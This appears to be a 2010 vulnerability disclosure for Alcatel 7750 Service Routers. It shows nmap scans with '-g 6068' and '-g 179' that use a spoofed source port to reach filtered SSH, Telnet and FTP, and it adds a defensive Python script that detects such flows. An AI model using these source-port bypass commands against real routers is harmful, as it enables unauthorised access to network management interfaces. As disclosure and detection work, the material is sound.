security vulnerability in 7750 Service Router
Posted: 26 May 2010 15:54
A serious security vulnerability has been detected in Alcatel 7750 SR routers. By setting the source port to 6068, you can reach the SSH, Telnet and FTP services through a VPRN interface that has no CPM filter.
Also, by setting the source port under 1024, you can reach the SSH service. Unless it is patched, the 7750 router is open to hackers, script kiddies and crackers.
Software: 7.0R9
TCP port 6068 is ANCP (Access Node Control Protocol), described in draft-ietf-ancp-protocol-04.txt. ANCP is an extension of the General Switch Management Protocol (GSMPv3).
TCP traffic sourced from port 6068 has full access to FTP, Telnet and SSH on the 7750.
The issue is very easy to reproduce: all that is needed is a VPRN interface with no CPM filter. In this case we used VPRN 3502. This problem can easily be stopped by CPM filters.
Here we can see that the nmap port scanner sees TCP port 6068 open:
root@:~# nmap -sS -n X.X.X.X -p 6068
PORT STATE SERVICE
6068/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
We can also see that SSH port 22 is NOT open:
root@:~# nmap -sS -n X.X.X.X -p 22
PORT STATE SERVICE
22/tcp filtered ssh
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Once we change the source port to 6068, however, SSH shows as open:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Same for Telnet:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 23
PORT STATE SERVICE
23/tcp open telnet
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
Same for FTP:
root@:~# nmap -sS -n X.X.X.X -g 6068 -p 21
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
With this information it is very easy to reach the CLI and attempt a login by making your SSH session use a source port of 6068.
The 7750 also accepts SSH sessions that have a source port less than 1024. For example, below (and confirmed with an SSH session) the 7750 allows an SSH session with a source port of 179 (BGP):
root@:~# nmap -sS -n X.X.X.X -g 179 -p 22
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.14 seconds
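The pattern in the scans above is that the router trusts a connection by its source port: a client arriving from port 6068 (ANCP) or from any port below 1024 gets through to SSH, Telnet or FTP. Real SSH, Telnet and FTP clients pick an ephemeral source port (1024 or higher), so a management-plane connection whose source port is 6068 or privileged is worth alerting on while the CPM filter fix is rolled out. The script below is an added example, not part of the original post or of any Alcatel software; it assumes a constructed one-line-per-flow log format (timestamp, protocol, src:port -> dst:port) and constructed sample records, and the detection rule generalizes the post's findings to all three management ports.

```python
"""Flag management-plane TCP flows whose client source port matches the
7750 source-port trust pattern described in the advisory.

Added example; the log format and the sample records are constructed for
illustration, not taken from a real exporter.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

MANAGEMENT_PORTS = {21, 22, 23}   # FTP, SSH, Telnet (the services shown reachable)
ANCP_PORT = 6068                  # ANCP source port the advisory reports as trusted
EPHEMERAL_MIN = 1024              # anything below is a privileged/well-known port

# Constructed record format (an assumption for this example):
#   <timestamp> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


def parse_flow(line: str) -> Optional[Flow]:
    """Parse one record; return None for lines that do not match the format."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    return Flow(
        ts=m["ts"],
        proto=m["proto"].lower(),
        src=m["src"],
        sport=int(m["sport"]),
        dst=m["dst"],
        dport=int(m["dport"]),
    )


def classify(flow: Flow) -> Optional[str]:
    """Return a reason string if the flow matches the bypass pattern, else None.

    Only TCP to a management port matters. A genuine SSH/Telnet/FTP client
    connects from an ephemeral (>= 1024) source port, so a source port of
    6068 or any port below 1024 on such a connection is the signature of the
    source-port trust problem the advisory demonstrates.
    """
    if flow.proto != "tcp" or flow.dport not in MANAGEMENT_PORTS:
        return None
    if flow.sport == ANCP_PORT:
        return f"source port {ANCP_PORT} (ANCP) to management port {flow.dport}"
    if flow.sport < EPHEMERAL_MIN:
        return f"privileged source port {flow.sport} to management port {flow.dport}"
    return None


def find_suspicious(lines: Iterable[str]) -> List[Tuple[Flow, str]]:
    """Run classify() over a log; unparseable lines are skipped."""
    hits: List[Tuple[Flow, str]] = []
    for line in lines:
        flow = parse_flow(line)
        if flow is None:
            continue
        reason = classify(flow)
        if reason:
            hits.append((flow, reason))
    return hits


# Constructed sample records using RFC 5737 documentation addresses, not real captures.
SAMPLE_LOG = [
    "2010-05-26T15:54:01 tcp 192.0.2.10:45123 -> 198.51.100.1:22",  # normal SSH client
    "2010-05-26T15:54:02 tcp 192.0.2.77:6068 -> 198.51.100.1:22",   # ANCP source port -> SSH
    "2010-05-26T15:54:03 tcp 192.0.2.77:6068 -> 198.51.100.1:23",   # ANCP source port -> Telnet
    "2010-05-26T15:54:04 tcp 192.0.2.77:179 -> 198.51.100.1:22",    # BGP source port -> SSH
    "2010-05-26T15:54:05 tcp 192.0.2.77:6068 -> 198.51.100.1:80",   # not a management port
    "2010-05-26T15:54:06 udp 192.0.2.77:6068 -> 198.51.100.1:22",   # not TCP
    "this line is not a flow record",
]

if __name__ == "__main__":
    for flow, reason in find_suspicious(SAMPLE_LOG):
        print(f"{flow.ts} {flow.src}:{flow.sport} -> {flow.dst}:{flow.dport}: {reason}")
```

Running the script on the sample records reports the two port-6068 flows and the port-179 flow to SSH, and ignores the normal client, the non-management port, the UDP record and the malformed line. Legitimate BGP traffic is not a false-positive source here, since a peer connects to destination port 179, not to SSH.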